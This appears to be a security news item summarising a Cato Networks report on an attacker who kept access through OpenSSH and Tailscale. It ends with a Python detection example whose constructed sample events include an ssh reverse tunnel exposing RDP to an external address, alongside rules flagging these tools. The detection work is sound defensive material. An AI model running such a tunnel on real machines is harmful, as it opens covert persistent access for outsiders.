A French-speaking attacker broke into a small automotive business, planted a keylogger, and stole banking credentials. Standard stuff — until he did something clever.
Before his command-and-control server went offline, he installed OpenSSH and Tailscale on a victim’s machine. That gave him a separate tunnel that didn’t depend on the C2 at all. When the Havoc server went dark the next day, his access survived.
Cato Networks captured the entire operation — 339 commands over 33 days — after the attacker left his SSH keys and a step-by-step playbook in an open storage bucket. Researchers call it “Operation Poisson.”
The attacker, a self-described junior operator on what looks like a school schedule, ran everything on free-tier tools: DuckDNS, Backblaze B2, a cheap IONOS VPS. He leaked his home directory five times and named his buckets after his own handle. He failed at roughly half his attempts but still compromised four machines.
Here’s the takeaway: pulling a C2 offline isn’t remediation if the attacker has already built a backdoor. The tools are all legitimate — signed binaries, standard remote-access software. Detection that only looks for bad files, not bad behavior, will miss this entirely.
Cato’s alert list: watch for OpenSSH Server on Windows workstations, tailscale.exe on machines that don’t need a VPN, and ssh -R reverse tunnels heading to external hosts.
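To show what behaviour-based detection for those three items looks like in practice, here is an added example (not Cato's code, and not from the report) that applies the rules to constructed process-creation events; the hostnames, file paths, the internal network ranges, the VPN_EXPECTED_HOSTS allowlist and the .corp.example DNS suffix are all assumptions made up for the example.

```python
import ipaddress
# Constructed sample process-creation events (not from the Cato report; hosts, paths and the 203.0.113.10 documentation address are made up).
SAMPLE_EVENTS = [
    {"host": "WS-ACCT-01", "role": "workstation", "image": r"C:\Program Files\OpenSSH\sshd.exe", "cmd": "sshd.exe"},
    {"host": "WS-ACCT-01", "role": "workstation", "image": r"C:\Program Files\Tailscale\tailscale.exe", "cmd": "tailscale.exe up"},
    {"host": "WS-ACCT-01", "role": "workstation", "image": r"C:\Windows\System32\OpenSSH\ssh.exe", "cmd": "ssh.exe -N -R 2222:localhost:3389 user@203.0.113.10"},
    {"host": "SRV-BUILD-02", "role": "server", "image": r"C:\Windows\System32\OpenSSH\ssh.exe", "cmd": "ssh.exe -R 8080:localhost:80 ops@10.0.0.5"},
    {"host": "WS-ACCT-01", "role": "workstation", "image": r"C:\Windows\System32\OpenSSH\ssh.exe", "cmd": "ssh.exe -p 2022 user@10.0.0.5"},
    {"host": "SRV-VPN-01", "role": "server", "image": r"C:\Program Files\Tailscale\tailscale.exe", "cmd": "tailscale.exe up"},
]

VPN_EXPECTED_HOSTS = {"SRV-VPN-01"}    # assumption: the only hosts that legitimately run Tailscale
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
INTERNAL_SUFFIXES = (".corp.example",)  # assumption: the org's internal DNS suffix
VALUE_FLAGS = {"-R", "-L", "-D", "-p", "-i", "-o", "-l", "-J", "-F", "-W", "-b", "-e", "-c", "-m"}  # ssh options that take a value

def ssh_target(cmd):
    """Return the destination host of an ssh command line: the first token that is neither an option nor an option's value."""
    tokens, i = cmd.split()[1:], 0
    while i < len(tokens):
        tok = tokens[i]
        if tok in VALUE_FLAGS:
            i += 2                         # skip the option and its separate value
        elif tok.startswith("-"):
            i += 1                         # bare flag, or an option with its value attached (-R2222:...)
        else:
            return tok.rsplit("@", 1)[-1]  # strip a user@ prefix
    return None

def is_external(host):
    """True when the host is an IP outside the internal ranges or a name outside the internal DNS suffix."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return not host.lower().endswith(INTERNAL_SUFFIXES)
    return not any(addr in net for net in INTERNAL_NETS)

def detect(events):
    """Apply the three behavioural rules from the alert list; returns (host, alert) pairs."""
    alerts = []
    for e in events:
        image = e["image"].rsplit("\\", 1)[-1].lower()
        if image == "sshd.exe" and e["role"] == "workstation":
            alerts.append((e["host"], "openssh-server-on-workstation"))
        elif image == "tailscale.exe" and e["host"] not in VPN_EXPECTED_HOSTS:
            alerts.append((e["host"], "tailscale-on-host-without-vpn-need"))
        elif image == "ssh.exe" and any(t == "-R" or t.startswith("-R") for t in e["cmd"].split()[1:]):
            target = ssh_target(e["cmd"])
            if target and is_external(target):
                alerts.append((e["host"], "ssh-reverse-tunnel-to-external:" + target))
    return alerts
```

Note that the reverse-tunnel rule keys on the `-R` option and an external destination, not on the binary: the same signed ssh.exe to an internal host (SRV-BUILD-02 above) stays quiet.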
